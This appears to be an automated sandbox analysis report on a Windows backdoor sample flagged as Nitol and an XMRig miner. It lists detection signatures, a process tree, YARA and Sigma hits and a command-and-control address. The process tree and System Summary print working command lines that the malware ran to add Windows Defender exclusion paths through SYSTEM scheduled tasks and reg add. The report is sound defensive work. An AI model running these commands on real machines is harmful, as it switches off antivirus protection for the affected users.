Windows Analysis Report
2976587-987347589.07.exe

Overview

General Information

Sample name: 2976587-987347589.07.exe
Analysis ID: 1588710
MD5: 67ab54b4fc69f4175d217dd57154a27c
SHA1: f753d5cf1dde05bd2b3417ddfcd12306219fdef3
SHA256: 898349755ad447054ca99dc779c1f5b6c1dd4a7c0dcf1dda1d0e8bbaa6406b36
Tags: backdoor, exe, silverfox, winos, user-zhuzhu0009

Detection

Nitol, Xmrig
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Detected unpacking (creates a PE file in dynamic memory)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Nitol
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
Adds extensions / path to Windows Defender exclusion list (Registry)
Creates an undocumented autostart registry key
Drops PE files to the document folder of the user
Drops password protected ZIP file
Found direct / indirect Syscall (likely to bypass EDR)
Found evasive API chain (may stop execution after checking mutex)
Found stalling execution ending in API Sleep call
Found strings related to Crypto-Mining
Machine Learning detection for dropped file
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
PE file contains section with special chars
Sample is not signed and drops a device driver
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Uses cmd line tools excessively to alter registry or file data
Uses schtasks.exe or at.exe to add and modify task schedules
Writes many files with high entropy
AV process strings found (often used to terminate AV products)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to delete services
Contains functionality to dynamically determine API calls
Contains functionality to enumerate running services
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Creates files inside the driver directory
Creates files inside the system directory
Creates or modifies windows services
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
Found evasive API chain checking for process token information
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
PE file contains an invalid checksum
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE
Sigma detected: Windows Defender Exclusions Added - Registry
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • 2976587-987347589.07.exe (PID: 1824 cmdline: "C:\Users\user\Desktop\2976587-987347589.07.exe" MD5: 67AB54B4FC69F4175D217DD57154A27C)
  • l0tiFM.exe (PID: 6756 cmdline: C:\Users\user\Documents\l0tiFM.exe MD5: D3709B25AFD8AC9B63CBD4E1E1D962B9)
  • l0tiFM.exe (PID: 4064 cmdline: C:\Users\user\Documents\l0tiFM.exe MD5: D3709B25AFD8AC9B63CBD4E1E1D962B9)
    • cmd.exe (PID: 4584 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 5896 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 3504 cmdline: SCHTASKS /Run /TN "Task1" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 5784 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • cmd.exe (PID: 1508 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5264 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 1656 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 2232 cmdline: SCHTASKS /Run /TN "Task1" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 4256 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • cmd.exe (PID: 5700 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 5252 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 5928 cmdline: SCHTASKS /Run /TN "Task1" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 6164 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • cmd.exe (PID: 6280 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 1816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 1376 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 2912 cmdline: SCHTASKS /Run /TN "Task1" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 3656 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • DfP1K3.exe (PID: 7124 cmdline: "C:\Program Files (x86)\DfP1K3\DfP1K3.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)
      • cmd.exe (PID: 6056 cmdline: cmd /c echo.>c:\xxxx.ini MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6528 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • reg.exe (PID: 5256 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
  • cmd.exe (PID: 6992 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • reg.exe (PID: 5832 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
  • cmd.exe (PID: 2840 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • reg.exe (PID: 6464 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
  • cmd.exe (PID: 6384 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • reg.exe (PID: 5980 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
  • DfP1K3.exe (PID: 4472 cmdline: "C:\Program Files (x86)\DfP1K3\DfP1K3.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)
  • Rpe5Ig0.exe (PID: 5420 cmdline: "C:\Program Files (x86)\3q7mMte5\Rpe5Ig0.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)
  • DfP1K3.exe (PID: 1308 cmdline: "C:\Program Files (x86)\DfP1K3\DfP1K3.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)
  • 53jGFr5v.exe (PID: 2140 cmdline: C:\ProgramData\53jGFr5v.exe MD5: C12239FE6BC555339AA48D933FC376D2)
  • lBoqoqIC.exe (PID: 916 cmdline: C:\ProgramData\efk2JUeS\lBoqoqIC.exe MD5: AA990DC3875790615E8CB024A78E9F9C)
  • Rpe5Ig0.exe (PID: 2388 cmdline: "C:\Program Files (x86)\3q7mMte5\Rpe5Ig0.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)
  • DfP1K3.exe (PID: 2076 cmdline: "C:\Program Files (x86)\DfP1K3\DfP1K3.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)
  • d0oKoK2T.exe (PID: 5952 cmdline: C:\ProgramData\atBs3ba9\d0oKoK2T.exe 1776 MD5: 147936E67DBDD86961409FE7D5821DA6)
Name: Nitol
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.nitol

Name: xmrig
Description: According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling". In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

No configs have been found

Source: 0000002A.00000002.3354834824.000000001002D000.00000004.00001000.00020000.00000000.sdmp, Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Author: Joe Security
Source: 0000002A.00000002.3352818905.0000000003A50000.00000004.00000020.00020000.00000000.sdmp, Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Author: Joe Security
Source: 00000034.00000002.3351062119.00007FF721F21000.00000040.00000001.01000000.00000010.sdmp, Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Author: Joe Security
Source: Process Memory Space: DfP1K3.exe PID: 7124, Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Author: Joe Security
Source: Process Memory Space: DfP1K3.exe PID: 7124, Rule: PlugXStrings, Description: PlugX Identifying Strings, Author: Seth Hardy, Strings:
  • 0x857b5:$Dwork: d:\work
  • 0xab33b:$Dwork: d:\work
  • 0x13bbc7:$Dwork: d:\work
  • 0xcf4f8:$Shell6: Shell6
  • 0xd02d7:$Shell6: Shell6

Source: 42.2.DfP1K3.exe.3a503e8.7.unpack, Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Author: Joe Security
Source: 42.2.DfP1K3.exe.3a503e8.7.raw.unpack, Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Author: Joe Security
Source: 42.2.DfP1K3.exe.10000000.8.unpack, Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Author: Joe Security
Source: 6.2.l0tiFM.exe.2800000.1.unpack, Rule: INDICATOR_SUSPICIOUS_DisableWinDefender, Description: Detects executables containing artifcats associated with disabling Widnows Defender, Author: ditekSHen, Strings:
  • 0x1fb0f:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fbc2:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fcd2:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fc20:$e2: Add-MpPreference -ExclusionPath
Source: 42.2.DfP1K3.exe.32a0000.6.unpack, Rule: INDICATOR_SUSPICIOUS_DisableWinDefender, Description: Detects executables containing artifcats associated with disabling Widnows Defender, Author: ditekSHen, Strings:
  • 0x221dd:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x2225b:$e2: Add-MpPreference -ExclusionPath

                System Summary

                Source: Process started, Author: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, CommandLine: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Users\user\Documents\l0tiFM.exe, ParentImage: C:\Users\user\Documents\l0tiFM.exe, ParentProcessId: 4064, ParentProcessName: l0tiFM.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, ProcessId: 4584, ProcessName: cmd.exe
                Source: Process started, Author: frack113: Data: Command: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f, CommandLine: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f, CommandLine|base64offset|contains: , Image: C:\Windows\System32\reg.exe, NewProcessName: C:\Windows\System32\reg.exe, OriginalFileName: C:\Windows\System32\reg.exe, ParentCommandLine: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6528, ParentProcessName: cmd.exe, ProcessCommandLine: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f, ProcessId: 5256, ProcessName: reg.exe
                Source: Registry Key set, Author: Christian Burkard (Nextron Systems): Data: Details: 0, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\reg.exe, ProcessId: 5256, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData
                Timestamp: 2025-01-11T04:43:28.898619+0100, SID: 2852901, Severity: 1, Classtype: Malware Command and Control Activity Detected, Source IP: 192.168.2.8, Source Port: 49988, Destination IP: 8.210.66.183, Destination Port: 8917, Protocol: TCP

                AV Detection

                Source: C:\ProgramData\53jGFr5v.exe, Avira: detection malicious, Label: HEUR/AGEN.1315326
                Source: C:\ProgramData\atBs3ba9\d0oKoK2T.exe, Avira: detection malicious, Label: HEUR/AGEN.1314683
                Source: C:\Program Files (x86)\DfP1K3\tbcore3U.dll, Avira: detection malicious, Label: TR/Redcap.vdzex
                Source: C:\Program Files (x86)\3q7mMte5\tbcore3U.dll, Avira: detection malicious, Label: TR/Redcap.vdzex
                Source: 2976587-987347589.07.exe, Virustotal: Detection: 15%
                Source: Submited Sample, Integrated Neural Analysis Model: Matched 100.0% probability
                Source: C:\ProgramData\53jGFr5v.exe, Joe Sandbox ML: detected
                Source: C:\ProgramData\atBs3ba9\d0oKoK2T.exe, Joe Sandbox ML: detected
                Source: C:\Program Files (x86)\DfP1K3\tbcore3U.dll, Joe Sandbox ML: detected
                Source: C:\Program Files (x86)\3q7mMte5\tbcore3U.dll, Joe Sandbox ML: detected

                Bitcoin Miner

                Source: Yara match, File source: 52.2.d0oKoK2T.exe.7ff721f20000.0.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 00000034.00000002.3351062119.00007FF721F21000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
                Source: Yara match, File source: Process Memory Space: d0oKoK2T.exe PID: 5952, type: MEMORYSTR
                Source: d0oKoK2T.exe, 00000034.00000002.3351062119.00007FF721F21000.00000040.00000001.01000000.00000010.sdmp, String found in binary or memory: stratum+tcp://

                Compliance

                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exe, Unpacked PE file: 42.2.DfP1K3.exe.2820000.3.unpack
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exe, Unpacked PE file: 42.2.DfP1K3.exe.2880000.4.unpack
                Source: unknown, HTTPS traffic detected: 39.103.20.105:443 -> 192.168.2.8:49708 version: TLS 1.2
                Source: unknown, HTTPS traffic detected: 118.178.60.9:443 -> 192.168.2.8:49737 version: TLS 1.2
                Source: unknown, HTTPS traffic detected: 118.178.60.103:443 -> 192.168.2.8:49990 version: TLS 1.2
                Source: unknown, HTTPS traffic detected: 118.178.60.103:443 -> 192.168.2.8:49994 version: TLS 1.2
                Source: Binary string: BootstrapPackagedGame-Win64-Shipping.pdb source: 2976587-987347589.07.exe
                Source: Binary string: d:\work\iGiveButton\toolbar4\Release_bin\uninstall.pdb source: l0tiFM.exe, 00000007.00000003.2330226957.0000000003D32000.00000004.00000020.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000000.2572435110.0000000000E98000.00000002.00000001.01000000.0000000A.sdmp, DfP1K3.exe, 0000002A.00000002.3349223878.0000000000E98000.00000002.00000001.01000000.0000000A.sdmp, DfP1K3.exe, 0000002A.00000002.3348166976.0000000000A7E000.00000004.00000020.00020000.00000000.sdmp, DfP1K3.exe, 0000002B.00000002.2616189489.0000000000E98000.00000002.00000001.01000000.0000000A.sdmp, DfP1K3.exe, 0000002B.00000000.2599264601.0000000000E98000.00000002.00000001.01000000.0000000A.sdmp, Rpe5Ig0.exe, 0000002C.00000002.2617538274.0000000000848000.00000002.00000001.01000000.0000000C.sdmp, Rpe5Ig0.exe, 0000002C.00000000.2603212393.0000000000848000.00000002.00000001.01000000.0000000C.sdmp, DfP1K3.exe, 0000002F.00000000.2618205476.0000000000E98000.00000002.00000001.01000000.0000000A.sdmp, DfP1K3.exe, 0000002F.00000002.2626427555.0000000000E98000.00000002.00000001.01000000.0000000A.sdmp, Rpe5Ig0.exe, 00000032.00000000.2963141398.0000000000848000.00000002.00000001.01000000.0000000C.sdmp, Rpe5Ig0.exe, 00000032.00000002.2970406917.0000000000848000.00000002.00000001.01000000.0000000C.sdmp, DfP1K3.exe, 00000033.00000002.2976452072.0000000000E98000.00000002.00000001.01000000.0000000A.sdmp, DfP1K3.exe, 00000033.00000000.2969401115.0000000000E98000.00000002.00000001.01000000.0000000A.sdmp
                Source: Binary string: c:\tools_git_priv\truesight\driver\objfre_win7_amd64\amd64\TrueSight.pdb source: 189atohci.sys.0.dr
                Source: Binary string: y:\avsdk5\engine\make\build\public\64-bit\vseamps.pdb source: l0tiFM.exe, 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmp, l0tiFM.exe, 00000006.00000000.2094593290.0000000140014000.00000002.00000001.01000000.00000008.sdmp, l0tiFM.exe, 00000007.00000000.2117625090.0000000140014000.00000002.00000001.01000000.00000008.sdmp, l0tiFM.exe.0.dr

                Change of critical system settings

                Source: C:\Windows\System32\reg.exe, Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\ProgramData
                Source: C:\Windows\System32\reg.exe, Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Users
                Source: C:\Windows\System32\reg.exe, Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Program Files (x86)
                Source: C:\Windows\System32\reg.exe, Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Users\user\Documents
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                Source: C:\Users\user\Documents\l0tiFM.exe, Code function: 6_2_00007FFBC320A1B8 FindFirstFileExW
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exe, Code function: 49_2_004C5A33 __EH_prolog,GetFullPathNameA,lstrcpyn,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpy
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exe, Code function: 49_2_004A1C80 FindFirstFileA,FindFirstFileA,FindFirstFileA,FindClose
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exe, Code function: 49_2_004A04A0 FindFirstFileA,FileTimeToLocalFileTime,FileTimeToDosDateTime,FindClose
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exe, Code function: 49_2_00408EFE __EH_prolog,GetFileAttributesA,lstrcpy,FindFirstFileA,FindClose
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exe, Code function: 49_2_00408E80 __EH_prolog,FindFirstFileA,FindClose
